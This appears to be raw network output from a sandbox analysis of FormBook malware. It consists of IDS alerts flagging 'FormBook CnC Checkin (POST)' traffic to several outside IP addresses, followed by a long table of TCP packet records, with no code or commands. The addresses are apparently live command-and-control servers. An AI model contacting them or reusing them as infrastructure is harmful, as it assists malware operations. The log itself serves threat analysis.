                                                                                                                                                                          2024-10-23T17:14:33.396021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550003206.238.184.16880TCP
                                                                                                                                                                          2024-10-23T17:14:36.083485+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550004206.238.184.16880TCP
                                                                                                                                                                          2024-10-23T17:14:44.529570+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550006104.21.3.19380TCP
                                                                                                                                                                          2024-10-23T17:14:47.062346+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550007104.21.3.19380TCP
                                                                                                                                                                          2024-10-23T17:14:49.773842+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550008104.21.3.19380TCP
                                                                                                                                                                          2024-10-23T17:14:58.520871+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550010103.71.154.1280TCP
                                                                                                                                                                          2024-10-23T17:15:01.601197+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550011103.71.154.1280TCP
                                                                                                                                                                          2024-10-23T17:15:03.711057+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550012103.71.154.1280TCP
                                                                                                                                                                          2024-10-23T17:15:11.992322+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500143.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:15:15.427113+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500153.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:15:17.092806+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500163.33.130.19080TCP
                                                                                                                                                                          2024-10-23T17:15:26.240614+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001884.32.84.3280TCP
                                                                                                                                                                          2024-10-23T17:15:28.781118+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55001984.32.84.3280TCP
                                                                                                                                                                          2024-10-23T17:15:31.339472+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002084.32.84.3280TCP
                                                                                                                                                                          2024-10-23T17:15:40.065139+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550022216.40.34.4180TCP
                                                                                                                                                                          2024-10-23T17:15:42.598114+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550023216.40.34.4180TCP
                                                                                                                                                                          2024-10-23T17:15:45.177835+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550024216.40.34.4180TCP
                                                                                                                                                                          2024-10-23T17:15:53.968528+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002637.9.175.19680TCP
                                                                                                                                                                          2024-10-23T17:15:56.391966+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002737.9.175.19680TCP
                                                                                                                                                                          2024-10-23T17:15:58.937014+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002837.9.175.19680TCP
                                                                                                                                                                          2024-10-23T17:16:07.744132+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003081.169.145.9580TCP
                                                                                                                                                                          2024-10-23T17:16:10.286417+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003181.169.145.9580TCP
                                                                                                                                                                          2024-10-23T17:16:13.338128+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003281.169.145.9580TCP
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Oct 23, 2024 17:12:47.945888042 CEST4981480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:12:47.951277018 CEST80498143.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:12:47.951426983 CEST4981480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:12:47.959638119 CEST4981480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:12:47.965049028 CEST80498143.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:12:51.543231010 CEST80498143.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:12:51.543776989 CEST80498143.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:12:51.545500994 CEST4981480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:12:51.546864986 CEST4981480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:12:51.552319050 CEST80498143.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:06.610543966 CEST4991580192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:06.616051912 CEST8049915142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:06.616178989 CEST4991580192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:06.626523972 CEST4991580192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:06.631967068 CEST8049915142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:07.557369947 CEST8049915142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:07.602345943 CEST4991580192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:07.677414894 CEST8049915142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:07.677494049 CEST4991580192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:08.130652905 CEST4991580192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:09.149657011 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:09.155291080 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:09.155453920 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:09.167762995 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:09.173213959 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:10.104099035 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:10.151277065 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:10.677913904 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.205584049 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:11.205600023 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:11.205732107 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.205732107 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.206031084 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:11.206075907 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.206171036 CEST8049931142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:11.206211090 CEST4993180192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.696851015 CEST4993980192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.702481031 CEST8049939142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:11.702625990 CEST4993980192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.713888884 CEST4993980192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:11.719279051 CEST8049939142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:11.719475985 CEST8049939142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:12.650151968 CEST8049939142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:12.693150043 CEST4993980192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:12.769784927 CEST8049939142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:12.769855022 CEST4993980192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:13.224515915 CEST4993980192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:14.243068933 CEST4995380192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:14.248652935 CEST8049953142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:14.248804092 CEST4995380192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:14.255765915 CEST4995380192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:14.261296034 CEST8049953142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:15.303634882 CEST8049953142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:15.349276066 CEST4995380192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:15.423058987 CEST8049953142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:15.423222065 CEST4995380192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:15.424077988 CEST4995380192.168.2.5142.250.186.115
                                                                                                                                                                          Oct 23, 2024 17:13:15.429569960 CEST8049953142.250.186.115192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:20.445679903 CEST4998280192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:20.451082945 CEST8049982142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:20.451170921 CEST4998280192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:20.462335110 CEST4998280192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:20.467781067 CEST8049982142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:21.315284014 CEST8049982142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:21.315402031 CEST8049982142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:21.315478086 CEST4998280192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:21.446013927 CEST8049982142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:21.446114063 CEST4998280192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:21.974436045 CEST4998280192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:22.993489027 CEST4998380192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:22.999001026 CEST8049983142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:22.999111891 CEST4998380192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:23.010222912 CEST4998380192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:23.015718937 CEST8049983142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:23.848776102 CEST8049983142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:23.848937035 CEST8049983142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:23.849009991 CEST4998380192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:23.968600988 CEST8049983142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:23.968787909 CEST4998380192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:24.522841930 CEST4998380192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:25.539856911 CEST4998480192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:25.545619965 CEST8049984142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:25.545733929 CEST4998480192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:25.555887938 CEST4998480192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:25.561290979 CEST8049984142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:25.561356068 CEST8049984142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:26.391789913 CEST8049984142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:26.391808987 CEST8049984142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:26.391997099 CEST4998480192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:26.710405111 CEST8049984142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:26.710551023 CEST4998480192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:27.068146944 CEST4998480192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:28.086796045 CEST4998580192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:28.092592955 CEST8049985142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:28.092680931 CEST4998580192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:28.100553989 CEST4998580192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:28.105935097 CEST8049985142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:28.962552071 CEST8049985142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:28.962616920 CEST8049985142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:28.962704897 CEST4998580192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:29.093533993 CEST8049985142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:29.093677044 CEST4998580192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:29.094674110 CEST4998580192.168.2.5142.250.184.211
                                                                                                                                                                          Oct 23, 2024 17:13:29.099992990 CEST8049985142.250.184.211192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:34.133850098 CEST4998680192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:34.139213085 CEST8049986217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:34.139287949 CEST4998680192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:34.151000977 CEST4998680192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:34.156455994 CEST8049986217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:34.980834961 CEST8049986217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:35.021188974 CEST4998680192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:35.103626013 CEST8049986217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:35.103769064 CEST4998680192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:35.661951065 CEST4998680192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:36.680572033 CEST4998780192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:36.686043024 CEST8049987217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:36.686191082 CEST4998780192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:36.697195053 CEST4998780192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:36.702624083 CEST8049987217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:37.543494940 CEST8049987217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:37.583734989 CEST4998780192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:37.666450024 CEST8049987217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:37.666538000 CEST4998780192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:38.209104061 CEST4998780192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:39.229473114 CEST4998880192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:39.235045910 CEST8049988217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:39.235184908 CEST4998880192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:39.247639894 CEST4998880192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:39.253119946 CEST8049988217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:39.253488064 CEST8049988217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:40.089466095 CEST8049988217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:40.130572081 CEST4998880192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:40.212826967 CEST8049988217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:40.212975979 CEST4998880192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:40.755565882 CEST4998880192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:41.774317980 CEST4998980192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:41.780713081 CEST8049989217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:41.780833960 CEST4998980192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:41.788021088 CEST4998980192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:41.794353008 CEST8049989217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:42.624665976 CEST8049989217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:42.624686003 CEST8049989217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:42.625130892 CEST4998980192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:42.747899055 CEST8049989217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:42.748087883 CEST4998980192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:42.748949051 CEST4998980192.168.2.5217.160.0.132
                                                                                                                                                                          Oct 23, 2024 17:13:42.754599094 CEST8049989217.160.0.132192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:47.798738003 CEST4999080192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:47.804218054 CEST8049990162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:47.806500912 CEST4999080192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:47.818368912 CEST4999080192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:47.823980093 CEST8049990162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:48.513768911 CEST8049990162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:48.552903891 CEST8049990162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:48.552967072 CEST4999080192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:49.336153984 CEST4999080192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:50.353236914 CEST4999180192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:50.358815908 CEST8049991162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:50.358887911 CEST4999180192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:50.372400045 CEST4999180192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:50.377772093 CEST8049991162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:51.046890020 CEST8049991162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:51.085486889 CEST8049991162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:51.090204954 CEST4999180192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:51.881210089 CEST4999180192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:52.903532982 CEST4999280192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:52.908960104 CEST8049992162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:52.909038067 CEST4999280192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:52.922655106 CEST4999280192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:52.928297997 CEST8049992162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:52.928311110 CEST8049992162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:53.596513987 CEST8049992162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:53.642716885 CEST8049992162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:53.642795086 CEST4999280192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:54.427438021 CEST4999280192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:55.446429014 CEST4999380192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:55.452286959 CEST8049993162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:55.458446026 CEST4999380192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:55.464106083 CEST4999380192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:55.469546080 CEST8049993162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:56.161041975 CEST8049993162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:56.199383974 CEST8049993162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:13:56.199484110 CEST4999380192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:56.200558901 CEST4999380192.168.2.5162.0.211.143
                                                                                                                                                                          Oct 23, 2024 17:13:56.205890894 CEST8049993162.0.211.143192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:01.382690907 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:01.388190985 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:01.388273001 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:01.398555994 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:01.404021978 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:02.022542953 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:02.022592068 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:02.911710024 CEST4999480192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:02.917105913 CEST80499943.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:03.930731058 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:03.936163902 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:03.936256886 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:03.947727919 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:03.953118086 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:04.567841053 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:04.567924023 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:05.458719015 CEST4999580192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:05.464231014 CEST80499953.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:06.483691931 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:06.489216089 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:06.489301920 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:06.507873058 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:06.513253927 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:06.513575077 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:08.021119118 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:08.026974916 CEST80499963.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:08.027115107 CEST4999680192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:09.040635109 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:09.046005011 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:09.046086073 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:09.055131912 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:09.061546087 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:09.680461884 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:09.681112051 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:09.681550980 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:09.684073925 CEST4999780192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:09.689367056 CEST80499973.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:14.720653057 CEST4999880192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:14.726372004 CEST80499983.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:14.726448059 CEST4999880192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:14.739398003 CEST4999880192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:14.744755983 CEST80499983.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:16.255448103 CEST4999880192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:16.265489101 CEST80499983.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:16.265552998 CEST4999880192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:17.280384064 CEST4999980192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:17.285909891 CEST80499993.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:17.290546894 CEST4999980192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:17.349052906 CEST4999980192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:17.354439974 CEST80499993.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:17.920013905 CEST80499993.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:17.920157909 CEST4999980192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:18.849237919 CEST4999980192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:18.854726076 CEST80499993.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:19.871198893 CEST5000080192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:19.876501083 CEST80500003.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:19.879545927 CEST5000080192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:19.970830917 CEST5000080192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:19.976227999 CEST80500003.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:19.976325989 CEST80500003.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:20.521584988 CEST80500003.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:20.521644115 CEST5000080192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:21.474545956 CEST5000080192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:21.480031967 CEST80500003.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:22.495850086 CEST5000180192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:22.501440048 CEST80500013.33.130.190192.168.2.5
                                                                                                                                                                          Oct 23, 2024 17:14:22.501514912 CEST5000180192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:22.510417938 CEST5000180192.168.2.53.33.130.190
                                                                                                                                                                          Oct 23, 2024 17:14:22.516009092 CEST80500013.33.130.190192.168.2.5
